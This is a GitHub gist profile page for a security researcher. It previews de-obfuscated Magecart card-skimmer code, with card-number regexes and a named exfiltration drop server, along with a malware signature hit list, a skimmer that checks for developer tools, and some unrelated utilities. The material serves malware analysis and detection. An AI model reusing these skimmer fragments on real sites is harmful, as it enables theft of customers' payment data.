Skip to content

Instantly share code, notes, and snippets.

Willem de Groot gwillem

Block or report user

Report or block gwillem

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@gwillem
gwillem / infowarstores.com.js
Created Nov 13, 2018
de-obfuscated infowarsstore.com payment skimmer as detected on 2018-11-12 by https://twitter.com/gwillem
View infowarstores.com.js
var idString = "id",
nameString = "name",
tokenOrCSRF = new RegExp("token|search|csfr|keyword|button"),
zoneRegionStateCountry = new RegExp("zone|region|state|country"),
formObj = {},
formLength = 0,
emptyString = "",
devToolsStatus = {
open: !1,
orientation: null
@gwillem
gwillem / techrabbit.com.js
Last active Oct 9, 2018
TechRabbit.com busted by Magecart again. Malware hosted at checkercarts.com / exfil server itenvoirtech.com
View techrabbit.com.js
var protocol = window.location.protocol != 'https:' ? 'http://' : 'https://';
var hostname = window.location.host;
var fieldNameRegex = 'shipping|billing|payment|cc|month|card|year|expiration|exp|cvv|cid|code|ccv|authorize|firstname|lastname|street|city|phone|number|email|zip|postal|region|country';
var ccRegex = '[0-9]{13,16}|[0-9 -]{16,20}';
var fieldTypeRegex = 'select|password|checkbox|radio|text|hidden|number|tel|email';
var orderButtons = 'a[title*=\'Place Order\'],a[href*=\'javascript: ; \'],a[href*=\'javascript: void (0)\'],a[href*=\'javascript: void (0); \'],a[href=\'#\'],button,input,submit,.btn,.button';
var emptyString = '';
var saveOrderURL = window.location.href.substr(window.location.href.replace('://', '').indexOf('/') + 3) + '/' + 'saveOrder';
var emptyList = [];
var dropServers = ['itenvoirtech.com'];
@gwillem
gwillem / pageseal.js
Created Sep 16, 2018
Page Seal partially de-obfuscated
View pageseal.js
const jsdom = require("jsdom");
const { JSDOM } = jsdom;
const dom = new JSDOM(`<!DOCTYPE html><p>Hello world</p>`,
{ url: "https://example.org/" });
var window = dom.window
var document = window.document
var $ = require("jquery")(window);
var jQuery = $;
@gwillem
gwillem / stats.txt
Created Sep 6, 2018
top malware signature hits for 2018-09-06
View stats.txt
4424 magentocore.net/
4023 \x6D\x61\x67\x65\x6E\x74\x6F\x63\x6F\x72\x65\x2E\x6E\x65\x74
4009 \x22\x63\x63\x5F\x65\x78\x70
772 \x63\x68\x65\x63\x6B\x6F\x75\x74
728 \x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C
699 \x6F\x6E\x65\x70\x61\x67\x65
685 CoinHive.
678 \x63\x68\x65\x63\x6B\x6F\x75\x74\x7C
669 \x6F\x6E\x65\x73\x74\x65\x70
648 \x6F\x6E\x65\x70\x61\x67\x65\x7C\x63\x68\x65\x63\x6B\x6F\x75\x74
View string_search_benchmarks.go
package main
import (
"fmt"
"io/ioutil"
"log"
"strings"
"testing"
"time"
@gwillem
gwillem / screenshot-upload.sh
Created Mar 13, 2018
One button screenshot uploader for Ubuntu
View screenshot-upload.sh
#!/bin/bash
# Requires xclip.
# Will create screenshot, upload to your server over SSH and copies the URL to the clipboard for your pleasure.
SRC_PATH=$1
SRC_FILE=$(/usr/bin/basename $SRC_PATH)
PREFIX=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 24 | head -n 1)
DST_FILE="${PREFIX}.png"
@gwillem
gwillem / getting-started.md
Last active Sep 20, 2018
Forensic Analysis -- getting started checklist
View getting-started.md

Security breach post mortem / analysis

Thank you for your assignment and your trust. To optimize the output and to get started quickly, I would need the following:

  1. Who is involved with the case on your side? Add me (gwillem@gmail.com) to a chat/hangout/telegram group with your dev/ops team for technical discussion.
  2. Send me an overview of what you have found so far.
    • Who discovered the breach? When and how?
    • Established timeline
    • Suspected point of entry
    • Affected services
@gwillem
gwillem / censys-coinhive.py
Created Nov 10, 2017
censys coinhive query
View censys-coinhive.py
#!/usr/bin/env python
import os
import censys.websites, censys.ipv4
UID = os.getenv('CENSYS_UID')
KEY = os.getenv('CENSYS_KEY')
NEEDLE='coinhive.min.js'
View m2-fingerprint-kata.md

M2 Fingerprint Kata

Objective: create an algorithm that identifies the version of a remote M2 install, by examining at most 5 URIs (limited as to not overload the remote server).

Background: I created a somewhat optimal set of fingerprints for Magento 1. However, for M2 there are fewer unique characteristics. I suspect that combining multiple fingerprints will yield better results. But how to establish the optimal set of fingerprint combinations?

Corpus

Use a list of 234 static files that have different checksums for different M2 versions.

@gwillem
gwillem / malware-that-detects-firebug-developer-tools.js
Created Apr 11, 2017
www.MageReport.com now checks for malware that disables itself when Firebug is detected
View malware-that-detects-firebug-developer-tools.js
! function(n, e, i) {
function t(n, e, i) {
for (var t = e % n.length, r = ""; r.length < n.length; t = (t + i) % n.length) r += n.charAt(t);
return r
}
function r(n, e) {
var i, r, o, c = function(n) {
var e = document.getElementById(n);
return e ? e.value || "" : ""
You can’t perform that action at this time.